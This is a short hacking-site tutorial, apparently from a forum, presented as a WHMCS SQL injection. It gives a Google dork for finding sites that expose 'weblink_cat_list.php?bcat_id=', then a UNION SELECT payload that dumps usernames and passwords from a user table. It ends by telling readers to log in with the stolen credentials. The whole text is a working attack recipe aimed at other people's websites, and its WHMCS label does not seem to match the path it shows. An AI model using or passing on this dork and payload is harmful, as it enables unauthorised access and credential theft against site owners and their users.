WHMCS SQL Injection Vulnerability - Exploits and Vulenrablities - Web Hacking - Hacking - GeniusHackers.Net
Main » Articles » Web Hacking » Exploits and Vulenrablities

WHMCS SQL Injection Vulnerability

Title: WHMCS SQL Injection Vulnerablity 

Author: MaX-HaCker

WHMCS SQL Injection Vulnerability. This is a very old vulnerability but still works.

Lets Start

Firstly find a vulnerable site by using Google Dork
inurl:"weblink_cat_list.php?bcat_id="
URL will be something like this

http://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=1
Then change the url from

http://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=1 

to

http://www.example.com/oldweb_kroobannok/weblink_cat_list.php?bcat_id=-1+UNION+SELECT+1,GROUP_concat(id,0x3a,username,0x3a,password),
3,4+from+user

Bang ! All username as well as passwords will be shown. Now login with that credentials.

Category: Exploits and Vulenrablities | Added by: MaX-HaCker (12.08.25)
Views: 920 | Rating: 5.0/1
Total comments: 0
Only registered users can add comments.
[ Registration | Login ]
Recommend on Google

Designed By [#]./3X3.R()()T
Like Us on Facebook Follow Us on Twitter Subscribe Us on Youtube WWW.GeniusHackers.NET © 2016
Founder and CEO of GeniusHackers [#] /3x3.R()()T
Hosted by uCoz
Hosted by uCoz